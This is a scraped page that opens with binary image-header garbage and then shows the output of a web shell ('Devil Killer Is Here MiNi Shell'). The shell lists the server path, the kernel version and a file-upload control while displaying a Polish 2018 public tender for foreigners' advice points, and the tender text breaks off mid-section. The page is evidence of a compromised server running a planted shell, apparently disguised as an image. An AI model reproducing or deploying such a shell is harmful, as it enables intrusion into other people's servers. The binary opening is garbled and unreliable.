JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180510/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180510/556093-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 556093-N-2018 z dnia 2018-05-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Lubuski Urząd Wojewódzki w Gorzowie Wlkp.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Utworzenie i prowadzenie Punktu informacyjno-doradczego dla cudzoziemców na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Lubuski Urząd Wojewódzki w Gorzowie Wlkp.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">21046708900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul Jagiellończyka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">66400 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Gorzów Wielkopolski</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubuskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">957 115 210</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">biuro.logistyki@lubuskie.uw.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">957 115 380</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">bip.lubuskie.uw.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">TAK</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.lubuskie.uw.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">TAK, w formie papierowej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Lubuski Urząd Wojewódzki w Gorzowie Wlkp. ul. Jagiellończyka 8, 66-400 Gorzów Wlkp.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Utworzenie i prowadzenie Punktu informacyjno-doradczego dla cudzoziemców na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PS-III.272.1.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiot zamówienia stanowią dwie części:I CZĘŚĆ ZAMÓWIENIA - usługi polegające na utworzeniu i prowadzeniu punktu informacyjno-doradczego w Gorzowie Wlkp. II część zamówienia - usługi polegające na utworzeniu i prowadzeniu punktu informacyjno-doradczego w Zielonej Górze.Zakres zadań stanowiący przedmiot zamówienia jest tożsamy dla części I i II i obejmuje: Utworzenie i prowadzenie punktu informacyjno-doradczego na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji, w którym obywatele państw trzecich otrzymają bezpłatną kompleksową informację i pomoc w zakresie funkcjonowania w środowisku lokalnym.Założenia funkcjonowania punktu:1) Punkt będzie zlokalizowany w miejscu ogólnodostępnym dla cudzoziemców, zapewniającym poufność rozmów.2) Wykonawca na własny koszt i własnym staraniem przystosuje lokal do świadczenia usług dla cudzoziemców.3) Punkt musi umożliwiać obsługę osób niepełnosprawnych oraz rodziców z dziećmi.4) Punkt musi zostać wyposażony w niezbędny sprzęt biurowy, tj. co najmniej:a) niezbędne meble biurowe dla pracowników (stanowisko biurowe) oraz dla odbiorców usługi (wieszak, stół i krzesła), b) sprzęt multimedialny (komputer\laptop z oprogramowaniem, faks, drukarka, skaner lub urządzenie wielofunkcyjne),c) telefon z numerem stacjonarnym,d) stały dostęp do internetu,e) wyposażenie socjalne (ekspres, czajnik, zestaw naczyń, dystrybutor z wodą).5) Wykonawca zapewni stały adres e-mail dla punktu, służący prowadzeniu korespondencji z Zamawiającym oraz z odbiorcami usług.6) W punktach będzie wydzielony kącik dla dzieci, który należy wyposażyć w stolik z krzesełkami, regał, zabawki, pufę, materiały piśmiennicze, dywanik.7) Wykonawca zapewni niezbędne do świadczenia usług materiały biurowe.8) Punkt będzie otwarty 5 dni w tygodniu, zgodnie z zaakceptowanym przez Zamawiającego harmonogramem, po minimum 6 godzin dziennie, w tym co najmniej jeden dzień do godziny 18:00 z wyłączeniem dni ustawowo wolnych od pracy.9) Usługi doradczo-informacyjne będą mogły być świadczone również poza lokalem Wykonawcy, np. w zakładach pracy.10) Wykonawca zapewni zarówno pracownikom, jak i odbiorcom usług możliwość korzystania z toalety.11) W punkcie nie może być prowadzona inna działalność gospodarcza.12) Usługi świadczone będą bezpłatne. Zakłada się, że w punkcie cudzoziemiec otrzyma rzetelną, kompleksową pomoc i doradztwo m.in. w kwestiach legalizacji pobytu, administracyjnych i prawnych, przysługujących praw pracowniczych, doradztwa i pomocy integracyjnej, opieki zdrowotnej, psychologicznej i socjalnej, opieki nad dziećmi oraz łączenia rodzin.13) Klientami punktu będą:a) Cudzoziemcy nie będący obywatelami UE, przebywający na terytorium RP legalnie, zgodnie z przepisami ustawy z dnia 12 grudnia 2013 r. o cudzoziemcach (z późniejszymi zmianami):- na podstawie wizy, o której mowa w art. 60 ust. 1 pkt. 4-6, 9-13, 17, 19-21, 23-25, - na podstawie zezwolenia na pobyt czasowy, pobyt stały (art. 195, z wyjątkiem ust. 1 pkt 6) lub zezwolenia na pobyt rezydenta długoterminowego UE (art. 211), - na podstawie dokumentu potwierdzającego posiadanie zgody na pobyt tolerowany o nazwie ,,zgoda na pobyt tolerowany" (art. 226 ust. 5),- zgody na pobyt ze względów humanitarnych.b) Dzieci ww. osób (nie będące obywatelami UE) urodzone na terytorium Rzeczypospolitej Polskiej. Pozostałe dzieci podlegają warunkom z punktu a i g. c) Cudzoziemcy, którzy złożyli wniosek o udzielenie zezwolenia na zamieszkanie na czas oznaczony w trybie abolicji, a obecnie przebywający na terytorium RP na podstawie stempla, którzy: - złożyli wniosek o udzielenie zezwolenia na pobyt czasowy (art. 108 ust. 1 pkt 2) - złożyli wniosek o udzielenie zezwolenia na pobyt stały (art. 206 ust. 1 pkt 2) - złożyli wniosek o udzielenie zezwolenia na pobyt rezydenta długoterminowego UE - złożyli wniosek o przedłużenie wizy Schengen lub wizy krajowej (art. 87 ust. 1 pkt 1), w którym uzasadnienie jest zgodne z jednym z następujących celów wskazanych w art. 60 ust. 1: pkt. 4-6, 9-13, 17, 19-21, 23-25, - złożyli wniosek o przedłużenie okresu pobytu w ramach ruchu bezwizowego na terytorium RP (art. 300 ust. 4). d) Przebywają na terytorium RP w ramach ruchu bezwizowego.e) Cudzoziemcy nie będący obywatelami UE, przebywający na terytorium RP, którzy są w trakcie uzyskiwania zezwolenia na legalny pobyt w Polsce. UWAGA wsparcie dla tych osób jest ograniczone do pomocy w uzyskaniu legalnego pobytu. f) Małżonkowie, wstępni oraz zstępni osób należących do grup ww. 1-4, w takim zakresie jaki jest konieczny do skutecznej realizacji działań.g) Osoby, nie będące obywatelami UE, przebywające na terytorium RP legalnie, które złożyły wniosek o:- udzielenie cudzoziemcowi zezwolenia na pobyt rezydenta długoterminowego Unii Europejskiej (art. 223),- przedłużenie wizy Schengen lub wizy krajowej (art. 87), w którym uzasadnienie jest zgodne z jednym z następujących celów wskazanych w art. 60 ust. 1: pkt. 4-6, 9-13, 17, 19-21, 23-25,- przedłużenie okresu pobytu w ramach ruchu bezwizowego na terytorium RP (art. 300) i uzyskały w dokumencie podróży odcisk stempla potwierdzającego złożenie wniosku o udzielenie zezwolenia. Z powyższej grupy klientów wyłączeni są obywatele kraju trzeciego posiadający również obywatelstwo jednego z krajów UE.14) Punkt będzie zapewniał wykwalifikowaną kadrę pracowniczą tj.:- doradcę integracyjnego posługującego się językiem ukraińskim lub rosyjskim w stopniu umożliwiającym swobodną komunikację. Doradca integracyjny będzie zatrudniony przez cały okres trwania projektu,- prawnika posiadającego uprawnienia wymagane dla radcy prawnego lub adwokata. Prawnik będzie świadczył usługi w punkcie co najmniej 2 godziny w tygodniu przez cały okres trwania projektu.- psychologa, którego wykształcenie będzie potwierdzone dyplomem ukończenia jednolitych studiów magisterskich na kierunku psychologia. Psycholog będzie świadczył usługi w punkcie co najmniej 1 godzinę w tygodniu przez cały okres trwania projektu. 15) Na podstawie art. 29 ust. 3a ustawy Zamawiający wymaga, aby osoba wskazana jako doradca integracyjny wykonujący czynności informacyjno - doradcze zatrudniony był przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2018 r. poz. 108).16) Wykonawca przez okres trwania projektu udzieli pomocy co najmniej 1500 cudzoziemcom. 17) Wykonawca zobowiązany będzie do udzielenia co najmniej:- 2000 porad integracyjnych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 90,- 150 porad prawnych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 6,- 100 porad psychologicznych w trakcie trwania całego projektu z zastrzeżeniem, że liczba porad miesięcznie nie może być niższa niż 4.18) Udzielając pomocy (porad) wykonawca będzie zobligowany do dokumentowania udzielonej pomocy za pomocą list obecności, wykazu osób, którym udzielono wsparcia, list udzielonych porad oraz deklaracji o przystąpieniu do projektu.19) Wykonawca będzie zobligowany do dostarczania zleceniodawcy miesięcznych oraz kwartalnych sprawozdań z prowadzonych w punkcie działań.20) Wykonawca zobowiązany jest do bieżącego dokumentowania świadczonych usług zgodnie ze wzorem druków dokumentów opracowanych przez Zamawiającego oraz przechowywania dokumentacji w punkcie.21) Wykonawca prowadzić będzie sprawozdawczość merytoryczną i statystyczną ze świadczonych usług, w szczególności sporządzać będzie sprawozdania miesięczne i kwartalne, które przekaże Zamawiającemu w oryginale oraz w formie elektronicznej w terminie 15 dni od zakończenia miesiąca i kwartału.22) Usługi będą świadczone na warunkach określonych w załączonym wzorze umowy.23) Zleceniobiorca zobowiązany będzie do prowadzenia listy obecności/ wykazu osób, którym udzielono wsparcia w formie elektronicznej i przekazywania jej również w formie elektronicznej do Zamawiającego na podany adres email w terminie do 15 dnia każdego miesiąca za miesiąc poprzedni.24) Wykonawca zobowiązuje się do uruchomienia punktu do dnia 29 czerwca 2018 r.25) Wykonawca zapewni uroczyste otwarcie punktu. W ramach uroczystości wykonawca zapewni catering dla zaproszonych gości (ok 20).26) Wykonawca prowadzić będzie punkt 22 miesiące od dnia uruchomienia.27) W celu prawidłowego sporządzenia oferty, Wykonawca powinien zapoznać się z oczekiwaniami i wymogami Zamawiającego oraz uzyskać wszystkie niezbędne informacje, co do ryzyka, trudności i wszelkich innych okoliczności, jakie mogą wystąpić w trakcie realizacji zamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">79140000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">22</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22</TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, 